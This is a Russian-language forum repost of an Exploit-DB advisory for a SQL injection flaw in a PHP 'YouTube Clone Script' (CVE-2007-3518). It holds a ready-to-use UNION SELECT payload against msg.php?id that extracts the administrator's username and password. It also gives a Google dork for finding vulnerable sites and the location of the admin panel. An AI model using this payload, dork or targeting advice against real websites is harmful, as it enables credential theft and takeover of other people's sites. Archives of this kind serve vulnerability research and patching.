Exploit YouTube Clone Script - 'msg.php?id' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4136
Проверка EDB
  1. Пройдено
Автор
T0PP8UZZ
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-3518
Дата публикации
2007-07-02
Код:
--==+================================================================================+==--
--==+                YouTube Clone Script SQL Injection Vulnerability                +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: http://www.hispah.com/index.php?act=viewProd&productId=20
DORK: allinurl:"channel_detail.php?chid="

DESCRIPTION:
Remote SQL injection in msg.php id, able to pull admin user/pass.

EXPLOIT:
http://site.com/path/msg.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,0x7430705038755A7A20616E64207870726F67206F776E616765,convert(concat((SELECT/**/svalue/**/from/**/sconfig/**/where/**/soption=0x61646D696E5F6E616D65),0x3a,(SELECT/**/svalue/**/from/**/sconfig/**/where/**/soption=0x61646D696E5F70617373))/**/using/**/latin1),4,5,6,7,8,9/*


Tip/Note:
Majority of the sites require login to view msg.php None of the registration info is checked.

Admin Panel is in /siteadmin/



GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !


--==+================================================================================+==--
--==+                YouTube Clone Script SQL Injection Vulnerability                +==--
--==+================================================================================+==--

# milw0rm.com [2007-07-02]
 
Источник
www.exploit-db.com

Похожие темы